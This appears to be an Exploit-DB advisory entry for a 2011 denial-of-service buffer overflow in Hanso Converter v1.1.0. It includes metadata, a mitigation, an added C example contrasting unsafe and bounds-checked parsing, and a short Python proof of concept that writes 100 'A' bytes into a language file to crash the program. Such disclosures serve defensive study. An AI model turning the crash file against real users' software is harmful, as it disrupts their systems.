Vendor: Hanso Converter
By: Dame Jovanoski(badc0re)
CVSS: 7.8 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: Hanso Converter
Affected Version From: v1.1.0
Affected Version To: v1.1.0
Patch Exists: Yes
Related CWE: N/A
CPE: hanso-converter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Hanso Converter v1.1.0 Language File Buffer Overflow – Denial of Service

Hanso Converter v1.1.0 contains a buffer overflow that is triggered when a specially crafted XML file is opened. The vulnerability is due to a lack of proper validation of user-supplied data when parsing the XML file. An attacker who creates a malicious XML file and convinces the user to open it can cause a denial of service condition.

Mitigation:

Upgrade to the latest version of Hanso Converter.
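
The description above attributes the crash to missing validation while parsing the language file. As an added example (not Hanso Converter's code and not part of the original advisory), the C below contrasts an unchecked copy with a loader that validates length before copying; the `<label>` element, `LABEL_CAP` and all function names are assumptions.

```c
/* Added illustration: hypothetical loader, not Hanso Converter's code. */
#include <stdio.h>
#include <string.h>
#define LABEL_CAP 64 /* assumed size of the fixed destination buffer */
enum lang_status { LANG_OK, LANG_MALFORMED, LANG_TOO_LONG };

/* Vulnerable pattern (CWE-119), for contrast only and never called:
 * the copy length is decided by the file, not by the destination. */
void load_label_unsafe(char *dst, const char *file_text)
{
    strcpy(dst, file_text);
}

/* Return the offset of tag within buf[from..len), or len if absent. */
static size_t find_tag(const char *buf, size_t len, size_t from, const char *tag)
{
    size_t n = strlen(tag);
    for (; from + n <= len; from++)
        if (memcmp(buf + from, tag, n) == 0) return from;
    return len;
}

/* Hardened: bounds-checked search, length validated before the copy. */
enum lang_status load_label_checked(const char *buf, size_t len,
                                    char *dst, size_t dst_cap)
{
    size_t start, end, n;
    if (!buf || !dst || dst_cap == 0) return LANG_MALFORMED;
    dst[0] = '\0';                          /* fail closed on every error path */
    start = find_tag(buf, len, 0, "<label>");
    if (start == len) return LANG_MALFORMED;
    start += 7;                             /* strlen("<label>") */
    end = find_tag(buf, len, start, "</label>");
    if (end == len) return LANG_MALFORMED;
    n = end - start;
    if (n >= dst_cap) return LANG_TOO_LONG; /* reject, do not truncate */
    if (memchr(buf + start, '\0', n)) return LANG_MALFORMED;
    memcpy(dst, buf + start, n);
    dst[n] = '\0';
    return LANG_OK;
}

int main(void)
{
    char label[LABEL_CAP], junk[100];
    memset(junk, 'A', sizeof junk);         /* constructed: 100 x 0x41, no markup */
    printf("%d\n", load_label_checked(junk, sizeof junk, label, sizeof label));
    return 0;
}
```

Rejecting an over-long value instead of truncating it keeps a malformed language file from being partially loaded.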

Exploit-DB raw data:

# Exploit Title: Hanso Converter v1.1.0 Language File Buffer Overflow - Denial OF Service
# Date: 05.02.2011
# Author: Dame Jovanoski(badc0re)
# Software Link: http://www.hansotools.com/downloads/hanso-converter-setup.exe
# Version: v1.1.0
# Tested on: XP sp3
# Type of exploit:local

import time

# Status output while the file is prepared
print("Creating exploit.")
time.sleep(1)
print("Creating exploit..")
time.sleep(1)
print("Creating exploit...")

# Payload: 100 'A' bytes (0x41) written in place of valid XML
junk = "\x41" * 100
print("Payload size is:", len(junk))

try:
    # Write the payload to the language file app_fr.xml
    with open("app_fr.xml", "w") as f:
        f.write(junk)
    print("File created")
except IOError:
    print("File cannot be created")